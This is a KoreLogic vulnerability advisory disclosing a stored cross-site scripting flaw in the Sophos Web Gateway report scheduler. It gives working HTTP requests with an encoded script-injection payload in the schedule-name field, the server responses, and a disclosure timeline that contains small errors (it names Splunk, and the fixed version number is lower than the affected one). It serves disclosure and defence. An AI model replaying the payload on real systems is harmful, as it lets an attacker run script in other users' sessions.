KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability

Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
Advisory ID: KL-001-2018-001
Publication Date: 2018.01.26
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt


1. Vulnerability Details

     Affected Vendor: Sophos
     Affected Product: Web Gateway
     Affected Version: 4.4.1
     Platform: Embedded Linux
     CWE Classification: CWE-79: Improper Neutralization of Input During Web
                         Page Generation, CWE-80: Improper Neutralization of
                         Script-Related HTML Tags in a Web Page
     Impact: Arbitrary Code Execution
     Attack vector: HTTP

2. Vulnerability Description

     The report scheduler menu within the management portal
     contains a persistent cross site scripting vulnerability. This
     vulnerability can be used to target other users of the same
     portal.

3. Technical Description

     A valid session is required to create the report with the
     persistent cross site scripting payload attached. An example
     attack payload has been included below. This payload is designed
     to trigger an alert box with the number one being displayed.

         POST /index.php?c=report_scheduler HTTP/1.1
         Host: 1.3.3.7
         Accept-Language: en-US,en;q=0.5
         X-Requested-With: XMLHttpRequest
         X-Prototype-Version: 1.6.1
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         Content-Length: 1190
         DNT: 1
         Connection: close


action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d


         HTTP/1.1 200 OK
         Date: Sat, 29 Jul 2017 16:05:25 GMT
         Server: Apache
         Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
         Pragma: no-cache
         X-Frame-Options: sameorigin
         X-Content-Type-Options: nosniff
         Connection: close
         Content-Type: text/html; charset=utf-8
         Content-Length: 41

         {"status":0,"statusMsg":"Settings saved"}


     The URL-encoded input being passed in input parameter can be
     decoded to a array containing a single JSON buffer.


         [{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1",
"sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday",
"txt_schedule_name": "test<script>alert(1);</script>", "cb_activate_schedule": "yes", "recipients": "test@test.asdasd",
"schedule_id": "dGVzdA==", "owner": "admin"}]


     Within the JSON buffer is a key called txt_schedule_name. The
     value for this key is the name of the scheduled report. This
     value is included in the report schedule list.


         "txt_schedule_name": "test<script>alert(1);</script>"

     The HTML tags are then stored.  When the report schedule is
     viewed, the resulting JSON is sent as content-type text/html
     instead of application/json, causing the browser to execute any
     unescaped javascript it contains.  The output is HTML-encoded
     with the exception of the txt_schedule_name: value which is
     not sanitized, and the payload triggers.


         POST /index.php?c=report_scheduler HTTP/1.1
         Host: 1.3.3.7
         Accept: text/javascript, text/html, application/xml, text/xml, */*
         Accept-Language: en-US,en;q=0.5
         X-Requested-With: XMLHttpRequest
         X-Prototype-Version: 1.6.1
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         Content-Length: 81
         DNT: 1
         Connection: close

         action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd


         HTTP/1.1 200 OK
         Date: Sat, 29 Jul 2017 16:06:38 GMT
         Server: Apache
         Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
         Pragma: no-cache
         X-Frame-Options: sameorigin
         X-Content-Type-Options: nosniff
         Connection: close
         Content-Type: text/html; charset=utf-8
         Content-Length: 1365


{"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>alert(1);<\/script>","cb_activate_schedule":"yes","recipients":"test@test.asdasd","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul
id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test&lt;script&gt;alert(1);&lt;\/script&gt;\"><div
class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\"
title=\"test&lt;script&gt;alert(1);&lt;\/script&gt;\">test&lt;script&gt;alert(1);&lt;\/script&gt;<\/a><\/div><div
class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div
title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a
href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test&lt;script&gt;alert(1);&lt;\/script&gt;\"
name=\"on_off_test&lt;script&gt;alert(1);&lt;\/script&gt;\" class=\"button small\"><span class=\"buttonLabel small\"
id=\"on_off_span_test&lt;script&gt;alert(1);&lt;\/script&gt;\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input
type=\"checkbox\" id=\"chk_test&lt;script&gt;alert(1);&lt;\/script&gt;\"\/><\/div><\/li><\/ul>"}

4. Mitigation and Remediation Recommendation

     The vendor has released version 4.3.3.1 of the Web Gateway
     which addesses this issue. Release notes available at:

     http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2017.08.17 - KoreLogic submits vulnerability details to Sophos.
     2017.08.17 - Sophos confirms receipt.
     2017.09.29 - 30 business days have elapsed since the vulnerability
                  was reported to Sophos.
     2017.10.17 - KoreLogic requests an update from Sophos.
     2017.10.19 - Sophos informs KoreLogic that they will issue a fix in
                  the next maintenance release, scheduled for the end of
                  November. Sophos asks KoreLogic to hold disclosure until
                  the new version is released.
     2017.10.23 - 45 business days have elapsed since the vulnerability
                  was reported to Splunk.
     2017.11.02 - Sophos notifies KoreLogic that the maintenance release
                  has gone live.
     2018.01.26 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description.


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Attachment: signature.asc
Description: OpenPGP digital signature


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux